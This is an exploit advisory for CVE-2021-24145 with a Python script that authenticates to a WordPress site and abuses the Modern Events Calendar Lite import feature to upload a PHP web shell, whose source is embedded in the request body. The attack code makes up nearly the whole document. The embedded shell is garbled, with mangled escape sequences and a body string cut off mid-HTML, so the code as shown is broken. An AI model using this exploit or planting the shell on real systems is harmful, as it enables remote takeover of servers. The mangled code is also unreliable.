Authored by Ron Jost

WordPress Modern Events Calendar plugin version 5.16.2 suffers from a remote shell upload vulnerability.

advisories | CVE-2021-24145

# Exploit Title: WordPress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)
# Date 01.07.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://webnus.net/modern-events-calendar/
# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip
# Version: Before 5.16.5
# Tested on: Ubuntu 18.04
# CVE: CVE-2021-24145
# CWE: CWE-434
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md

'''
Description:
Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5,
did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv'
content-type in the request.
'''


'''
Banner:
'''
banner = """
  ______     _______     ____   ___ ____  _      ____  _  _   _ _  _  ____  
 / ___    / / ____|   |___  / _ ___ / |    |___ | || | / | || || ___| 
| |      / /|  _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___  
| |___   V / | |__|_____/ __/| |_| / __/| |_____/ __/|__   _| |__   _|__) |
 ____|  _/  |_____|   |_____|___/_____|_|    |_____|  |_| |_|  |_||____/ 

                * WordPress Plugin Modern Events Calendar Lite RCE                                                        
                * @Hacker5preme


"""
print(banner)

'''
Import required modules:
'''
import requests
import argparse

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--PATH', type=str)
my_parser.add_argument('-u', '--USERNAME', type=str)
my_parser.add_argument('-p', '--PASSWORD', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
wp_path = args.PATH
username = args.USERNAME
password = args.PASSWORD
print('')

'''
Authentication:
'''
session = requests.Session()
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'

# Header:
header = {
    'Host': target_ip,
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',
    'Accept-Encoding': 'gzip, deflate',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Origin': 'http://' + target_ip,
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
}

# Body:
body = {
    'log': username,
    'pwd': password,
    'wp-submit': 'Log In',
    'testcookie': '1'
}

# Authenticate:
print('')
auth = session.post(auth_url, headers=header, data=body)
auth_header = auth.headers['Set-Cookie']
if 'wordpress_logged_in' in auth_header:
    print('[+] Authentication successfull !')
else:
    print('[-] Authentication failed !')
    exit()


'''
Exploit:
'''
exploit_url = "http://" + target_ip + ':' + target_port + wp_path + "wp-admin/admin.php?page=MEC-ix&tab=MEC-import"

# Exploit Header:
header = {
    "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
    "Accept-Language": "de,en-US;q=0.7,en;q=0.3",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "multipart/form-data; boundary=---------------------------29650037893637916779865254589",
    "Origin": "http://" + target_ip,
    "Connection": "close",
    "Upgrade-Insecure-Requests": "1"
}

# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell
body = "-----------------------------29650037893637916779865254589rnContent-Disposition: form-data; name="feed"; filename="shell.php"rnContent-Type: text/csvrnrn<?phpnnfunction featureShell($cmd, $cwd) {n    $stdout = array();nn    if (preg_match("/^s*cds*$/", $cmd)) {n        // passn    } elseif (preg_match("/^s*cds+(.+)s*(2>&1)?$/", $cmd)) {n        chdir($cwd);n        preg_match("/^s*cds+([^s]+)s*(2>&1)?$/", $cmd, $match);n        chdir($match[1]);n    } elseif (preg_match("/^s*downloads+[^s]+s*(2>&1)?$/", $cmd)) {n        chdir($cwd);n        preg_match("/^s*downloads+([^s]+)s*(2>&1)?$/", $cmd, $match);n        return featureDownload($match[1]);n    } else {n        chdir($cwd);n        exec($cmd, $stdout);n    }nn    return array(n        "stdout" => $stdout,n        "cwd" => getcwd()n    );n}nnfunction featurePwd() {n    return array("cwd" => getcwd());n}nnfunction featureHint($fileName, $cwd, $type) {n    chdir($cwd);n    if ($type == 'cmd') {n        $cmd = "compgen -c $fileName";n    } else {n        $cmd = "compgen -f $fileName";n    }n    $cmd = "/bin/bash -c "$cmd"";n    $files = explode("n", shell_exec($cmd));n    return array(n        'files' => $files,n    );n}nnfunction featureDownload($filePath) {n    $file = @file_get_contents($filePath);n    if ($file === FALSE) {n        return array(n            'stdout' => array('File not found / no read permission.'),n            'cwd' => getcwd()n        );n    } else {n        return array(n            'name' => basename($filePath),n            'file' => base64_encode($file)n        );n    }n}nnfunction featureUpload($path, $file, $cwd) {n    chdir($cwd);n    $f = @fopen($path, 'wb');n    if ($f === FALSE) {n        return array(n            'stdout' => array('Invalid path / no write permission.'),n            'cwd' => getcwd()n        );n    } else {n        fwrite($f, base64_decode($file));n        fclose($f);n        return array(n            'stdout' => array('Done.'),n            'cwd' => getcwd()n        );n    }n}nnif (isset($_GET["feature"])) {nn    $response = NULL;nn    switch ($_GET["feature"]) {n        case "shell":n            $cmd = $_POST['cmd'];n            if (!preg_match('/2>/', $cmd)) {n                $cmd .= ' 2>&1';n            }n            $response = featureShell($cmd, $_POST["cwd"]);n            break;n        case "pwd":n            $response = featurePwd();n            break;n        case "hint":n            $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);n            break;n        case 'upload':n            $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);n    }nn    header("Content-Type: application/json");n    echo json_encode($response);n    die();n}nn?><!DOCTYPE html>nn<html>nn    <head>n        <meta charset="UTF-8" />n        <title>p0wny@shell:~#</title>n        <meta name="viewport" content="width=device-width, initial-scale=1.0" />n        <style>n            html, body {n                margin: 0;n                padding: 0;n                background: #333;n                color: #eee;n                font-family: monospace;n            }nn            *::-webkit-scrollbar-track {n                border-radius: 8px;n                background-color: #353535;n            }nn            *::-webkit-scrollbar {n                width: 8px;n                height: 8px;n            }nn            *::-webkit-scrollbar-thumb {n                border-radius: 8px;n                -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);n                background-color: #bcbcbc;n            }nn            #shell {n                background: #222;n                max-width: 800px;n                margin: 50px auto 0 auto;n                box-shadow: 0 0 5px rgba(0, 0, 0, .3);n                font-size: 10pt;n                display: flex;n            

# Exploit
session.post(exploit_url, headers=header, data=body)
print('')
print('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php')
print('')


RELATED ARTICLESMORE FROM AUTHOR